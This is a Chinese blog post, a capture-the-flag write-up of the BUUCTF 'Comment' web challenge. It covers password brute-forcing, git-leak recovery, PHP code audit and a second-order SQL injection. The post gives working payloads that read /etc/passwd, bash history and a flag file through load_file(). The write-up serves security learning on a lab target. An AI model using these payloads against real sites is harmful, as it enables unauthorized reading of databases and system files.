<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">






<link rel="stylesheet" href="/css/main.css?v=7.2.0">






<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">








<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    search: {
      root: '/',
      path: 'search.xml'
    },
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="考点密码爆破 git泄露 代码审计 二次注入 解题过程打开 一个留言板页面  一个登录页面  自己手工试了下，不存在万能密码绕过。仔细看了下输入框，发现有关键字，直接bp启动，开始爆破zhangwei*** 后三位。  构造3位纯数字作为payload  得到密码 zhangwei666  接下来登录  有个发帖和留言功能，用sqlmap也没检测出注入点。 接下来用dirsearch扫下目录。 1">
<meta name="keywords" content="CTF,密码爆破,二次注入,代码审计,文件泄露">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-WEB 【网鼎杯 2018】Comment 1">
<meta property="og:url" content="https://fanygit.github.io/2021/08/17/[网鼎杯 2018]Comment 1/index.html">
<meta property="og:site_name" content="Fan的小酒馆">
<meta property="og:description" content="考点密码爆破 git泄露 代码审计 二次注入 解题过程打开 一个留言板页面  一个登录页面  自己手工试了下，不存在万能密码绕过。仔细看了下输入框，发现有关键字，直接bp启动，开始爆破zhangwei*** 后三位。  构造3位纯数字作为payload  得到密码 zhangwei666  接下来登录  有个发帖和留言功能，用sqlmap也没检测出注入点。 接下来用dirsearch扫下目录。 1">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817194543695.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817194636328.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195007077.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195122300.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195558551.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817210615389.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817210959901.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817211904733.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817215143063.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817215607694.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817220952660.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221406991.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221527164.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221640270.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221909761.png">
<meta property="og:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221952756.png">
<meta property="og:updated_time" content="2021-10-02T07:25:55.248Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BUUCTF-WEB 【网鼎杯 2018】Comment 1">
<meta name="twitter:description" content="考点密码爆破 git泄露 代码审计 二次注入 解题过程打开 一个留言板页面  一个登录页面  自己手工试了下，不存在万能密码绕过。仔细看了下输入框，发现有关键字，直接bp启动，开始爆破zhangwei*** 后三位。  构造3位纯数字作为payload  得到密码 zhangwei666  接下来登录  有个发帖和留言功能，用sqlmap也没检测出注入点。 接下来用dirsearch扫下目录。 1">
<meta name="twitter:image" content="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817194543695.png">





  
  
  <link rel="canonical" href="https://fanygit.github.io/2021/08/17/[网鼎杯 2018]Comment 1/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  
  <title>BUUCTF-WEB 【网鼎杯 2018】Comment 1 | Fan的小酒馆</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>


</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Fan的小酒馆</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-playlist">

    
    
      
    

    

    <a href="/playlist/" rel="section"><i class="menu-item-icon fa fa-fw fa-music"></i> <br>歌单</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          <a href="javascript:;" class="popup-trigger">
          
            <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://fanygit.github.io/2021/08/17/[网鼎杯 2018]Comment 1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Fany">
      <meta itemprop="description" content="千里之行，始于足下。">
      <meta itemprop="image" content="/images/tx5.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Fan的小酒馆">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BUUCTF-WEB 【网鼎杯 2018】Comment 1

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2021-08-17 19:12:05" itemprop="dateCreated datePublished" datetime="2021-08-17T19:12:05+08:00">2021-08-17</time>
            </span>
          

          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2021-10-02 15:25:55" itemprop="dateModified" datetime="2021-10-02T15:25:55+08:00">2021-10-02</time>
              </span>
            
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/BUUCTF/" itemprop="url" rel="index"><span itemprop="name">BUUCTF</span></a></span>

                
                
              
            </span>
          

          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
                 阅读次数： 
                <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
              </span>
            </span>
          

          
            
  
  <span class="post-meta-item">
    
    <span class="post-meta-item-icon">
      <i class="fa fa-comment-o"></i>
    </span>
    
      <span class="post-meta-item-text">评论数：</span>
    
  
    <a href="/2021/08/17/[网鼎杯 2018]Comment 1/#comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/08/17/[网鼎杯 2018]Comment 1/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
          

          <br>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="考点"><a href="#考点" class="headerlink" title="考点"></a>考点</h3><p>密码爆破</p>
<p>git泄露</p>
<p>代码审计</p>
<p>二次注入</p>
<h3 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h3><p>打开</p>
<p>一个留言板页面</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817194543695.png" alt="image-20210817194543695"></p>
<p>一个登录页面</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817194636328.png" alt="image-20210817194636328"></p>
<p>自己手工试了下，不存在万能密码绕过。仔细看了下输入框，发现有关键字，直接bp启动，开始爆破<code>zhangwei***</code> 后三位。</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195007077.png" alt="image-20210817195007077"></p>
<p>构造3位纯数字作为payload</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195122300.png" alt="image-20210817195122300"></p>
<p>得到密码 <code>zhangwei666</code></p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817195558551.png" alt="image-20210817195558551"></p>
<p>接下来登录</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817210615389.png" alt="image-20210817210615389"></p>
<p>有个发帖和留言功能，用sqlmap也没检测出注入点。</p>
<p>接下来用dirsearch扫下目录。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 dirsearch.py -u &quot;http://ccd2d540-8775-4d4a-a19c-70165c4879f1.node4.buuoj.cn:81/&quot; -x 404,429 -s 1</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817210959901.png" alt="image-20210817210959901"></p>
<p>存在.git泄露</p>
<p>使用GitHacker对git文件进行恢复（ubuntu下）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">githacker --url http://ccd2d540-8775-4d4a-a19c-70165c4879f1.node4.buuoj.cn:81/.git --folder res --threads 1</span><br></pre></td></tr></table></figure>

<p>得到一个<code>write_do.php</code> 的文件</p>
<p>进目录中查找更改历史</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git log --reflog</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817211904733.png" alt="image-20210817211904733"></p>
<p>只显示这一个，看了别的师傅wp，这里会出来3个历史更改，然后用 <code>git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c</code> 命令，就可以得到完整的代码。</p>
<p>可能是工具或者环境的问题，这里直接给代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">"mysql.php"</span>;</span><br><span class="line">session_start();</span><br><span class="line"><span class="comment"># </span></span><br><span class="line"><span class="keyword">if</span>($_SESSION[<span class="string">'login'</span>] != <span class="string">'yes'</span>)&#123;</span><br><span class="line">    header(<span class="string">"Location: ./login.php"</span>);</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'do'</span>]))&#123;</span><br><span class="line">	<span class="keyword">switch</span> ($_GET[<span class="string">'do'</span>])</span><br><span class="line">	&#123;</span><br><span class="line">	<span class="keyword">case</span> <span class="string">'write'</span>:</span><br><span class="line">		$category = addslashes($_POST[<span class="string">'category'</span>]);</span><br><span class="line">		$title = addslashes($_POST[<span class="string">'title'</span>]);</span><br><span class="line">		$content = addslashes($_POST[<span class="string">'content'</span>]);</span><br><span class="line">		<span class="comment"># 将 category title content 插入 board 表中</span></span><br><span class="line">		$sql = <span class="string">"insert into board</span></span><br><span class="line"><span class="string">				set category = '$category',</span></span><br><span class="line"><span class="string">					title = '$title',</span></span><br><span class="line"><span class="string">					content = '$content'"</span>;</span><br><span class="line">		<span class="comment"># 执行sql</span></span><br><span class="line">		$result = mysql_query($sql);</span><br><span class="line">		header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">		<span class="keyword">break</span>;</span><br><span class="line">	<span class="keyword">case</span> <span class="string">'comment'</span>:</span><br><span class="line">		</span><br><span class="line">		$bo_id = addslashes($_POST[<span class="string">'bo_id'</span>]);</span><br><span class="line">		<span class="comment"># 根据 bo_id 查询 category 字段值</span></span><br><span class="line">		$sql = <span class="string">"select category from board where id='$bo_id'"</span>;</span><br><span class="line">		<span class="comment"># 执行sql</span></span><br><span class="line">		$result = mysql_query($sql);</span><br><span class="line">		$num = mysql_num_rows($result);</span><br><span class="line">		<span class="comment"># 大于0 代表有结果集</span></span><br><span class="line">		<span class="keyword">if</span>($num&gt;<span class="number">0</span>)&#123;</span><br><span class="line">			<span class="comment"># 获取 category 字段值</span></span><br><span class="line">			$category = mysql_fetch_array($result)[<span class="string">'category'</span>];</span><br><span class="line">			<span class="comment"># 获取提交内容</span></span><br><span class="line">			$content = addslashes($_POST[<span class="string">'content'</span>]);</span><br><span class="line">			<span class="comment"># 将 category 和 content 、bo_id 放入数据库中</span></span><br><span class="line">			<span class="comment"># sql语句中的 $category 变量是从数据库中取出，而 $category 的值 最开始由			  			  #	$_POST['category']</span></span><br><span class="line">			<span class="comment"># 经过 addslashes 对 单双引号 反斜线 进行转义（给' 转义成 \',\",\\）， 但是到数据库中 这些\</span></span><br><span class="line">			<span class="comment"># 会被丢弃，所以，这里存在二次注入</span></span><br><span class="line">			$sql = <span class="string">"insert into comment</span></span><br><span class="line"><span class="string">					set category = '$category',</span></span><br><span class="line"><span class="string">						content = '$content',</span></span><br><span class="line"><span class="string">						bo_id = '$bo_id'"</span>;</span><br><span class="line">			$result = mysql_query($sql);</span><br><span class="line">		&#125;</span><br><span class="line">		header(<span class="string">"Location: ./comment.php?id=$bo_id"</span>);</span><br><span class="line">		<span class="keyword">break</span>;</span><br><span class="line">	<span class="keyword">default</span>:</span><br><span class="line">		header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h4><p>这段代码有两个主要的作用，第一个分支<code>write</code>，是将帖子的标题、内容、分类插入到数据库中，第二个分支<code>comment</code>，提交留言，不过，这里在提交留言的时候，会先根据 <code>bo_id</code> 在数据库中进行查询，然后取出分类字段的字段值，然后再将取出的分类字段值和提交的留言以及bo_id插入到 <code>comment</code> 表中。虽说经过了 <code>addslashes</code> 进行转义，但是数据库中并不会存储 <code>\</code> ，所以在第二次取出<code>category</code>，再次进行拼接插入的时候，就照成了注入，也是二次注入。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$category = addslashes($_POST[<span class="string">'category'</span>]);</span><br><span class="line">		$title = addslashes($_POST[<span class="string">'title'</span>]);</span><br><span class="line">		$content = addslashes($_POST[<span class="string">'content'</span>]);</span><br><span class="line">		<span class="comment"># 将 category title content 插入 board 表中</span></span><br><span class="line">		$sql = <span class="string">"insert into board</span></span><br><span class="line"><span class="string">				set category = '$category',</span></span><br><span class="line"><span class="string">					title = '$title',</span></span><br><span class="line"><span class="string">					content = '$content'"</span>;</span><br></pre></td></tr></table></figure>

<p>这里并不存在注入。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这里的$category 是从数据中获取</span></span><br><span class="line"><span class="comment"># addslashes($_POST['category']); 拿到 ' " / 会转义成 \' \" \\ </span></span><br><span class="line"><span class="comment"># 但是这样的 \' 存储在数据库中 \会被丢弃</span></span><br><span class="line">$category = mysql_fetch_array($result)[<span class="string">'category'</span>];</span><br><span class="line">			<span class="comment"># 获取提交内容</span></span><br><span class="line">			$content = addslashes($_POST[<span class="string">'content'</span>]);</span><br><span class="line">			</span><br><span class="line">			$sql = <span class="string">"insert into comment</span></span><br><span class="line"><span class="string">					set category = '$category',</span></span><br><span class="line"><span class="string">						content = '$content',</span></span><br><span class="line"><span class="string">						bo_id = '$bo_id'"</span>;</span><br></pre></td></tr></table></figure>

<h4 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h4><p>构造payload <code>aa&#39;,content=database(),/*</code></p>
<p>先在index.php</p>
<p>POST</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=database(),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa%27%2Ccontent%3Ddatabase%28%29%2C%2F*&amp;content=111</span><br></pre></td></tr></table></figure>

<p> 插入的数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> board <span class="keyword">set</span> <span class="keyword">category</span> = <span class="string">'aa'</span>,<span class="keyword">content</span>=<span class="keyword">database</span>(),<span class="comment">/*', title = '111',content = '111';</span></span><br></pre></td></tr></table></figure>

<p>然后在comment.php </p>
<p>POST</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content=*/#&amp;bo_id=2</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content=*%2F%23&amp;bo_id=2</span><br></pre></td></tr></table></figure>

<p>插入的数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">comment</span> <span class="keyword">set</span> <span class="keyword">category</span> =<span class="string">'aa'</span>,<span class="keyword">content</span>=<span class="keyword">database</span>(),<span class="comment">/*', content = '*/</span><span class="comment">#',bo_id = '2';</span></span><br></pre></td></tr></table></figure>

<p>真正在数据库中执行的语句为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insert into comment set category = &apos;aa&apos;,content=database(),</span><br></pre></td></tr></table></figure>

<p>回显 数据库名</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817215143063.png" alt="image-20210817215143063"></p>
<p>先用下面payload尝试读取/etc/passwd</p>
<p>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=(select load_file(&apos;/etc/passwd&apos;)),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<p>comment.php </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content=*/#&amp;bo_id=2</span><br></pre></td></tr></table></figure>

<p>回显</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817215607694.png" alt="image-20210817215607694"></p>
<p>按照别的师傅wp指示</p>
<p>读取 /home/www/.bash_histroy  </p>
<p>构造payload</p>
<p>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=(select load_file(&apos;/home/www/.bash_history&apos;)),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817220952660.png" alt="image-20210817220952660"></p>
<p>再次读取 <code>.DS_store</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=(select load_file(&apos;/tmp/html/.DS_Store&apos;)),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221406991.png" alt="image-20210817221406991"></p>
<p>用hex函数继续读取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=(select hex(load_file(&apos;/tmp/html/.DS_Store&apos;))),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221527164.png" alt="image-20210817221527164"></p>
<p>解码</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221640270.png" alt="image-20210817221640270"></p>
<p>可以从字符串中看到一个带有flag字样的文件名，这个文件名不在/home/www中，在/var/www/html中，</p>
<p>接下来继续读取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">title=111&amp;category=aa&apos;,content=(select hex(load_file(&apos;/var/www/html/flag_8946e1ff1ee3e40f.php&apos;))),/*&amp;content=111</span><br></pre></td></tr></table></figure>

<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221909761.png" alt="image-20210817221909761"></p>
<p>得到，解码，拿到flag。</p>
<p><img src="https://hexo-1253463144.cos.ap-chongqing.myqcloud.com/image-20210817221952756.png" alt="image-20210817221952756"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这道题两个考点，又学到了新知识，第一个是git源码泄露，原本一直用的是githack，但是这个工具只能下载文件，不能查看历史版本，通过大佬的wp，又了解到一个githacker的工具，中途花了不少时间去安装这个工具，还是踩了些坑，这个工具要比githack强大些。第二个知识就是二次注入，二次注入做了很多次，每次花样都不一样，不看wp肯定做不起，不过又了解到了一种姿势，就此记录下来，原理都是一样。</p>

      
    </div>

    

    
      
    

    
    
    

    

    
      
    
    

    
      <div>
        




  



<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>Fany</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    
    <a href="https://fanygit.github.io/2021/08/17/[网鼎杯 2018]Comment 1/" title="BUUCTF-WEB 【网鼎杯 2018】Comment 1">https://fanygit.github.io/2021/08/17/[网鼎杯 2018]Comment 1/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/密码爆破/" rel="tag"># 密码爆破</a>
          
            <a href="/tags/二次注入/" rel="tag"># 二次注入</a>
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
            <a href="/tags/文件泄露/" rel="tag"># 文件泄露</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/08/16/[HITCON 2017]SSRFme 1/" rel="next" title="BUUCTF-WEB 【HITCON 2017】SSRFme 1">
                <i class="fa fa-chevron-left"></i> BUUCTF-WEB 【HITCON 2017】SSRFme 1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/08/21/[HFCTF2020]EasyLogin 1/" rel="prev" title="BUUCTF-WEB 【HFCTF2020】EasyLogin 1">
                BUUCTF-WEB 【HFCTF2020】EasyLogin 1 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  </div>


          </div>
          
  
    
    <div class="comments" id="comments"></div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
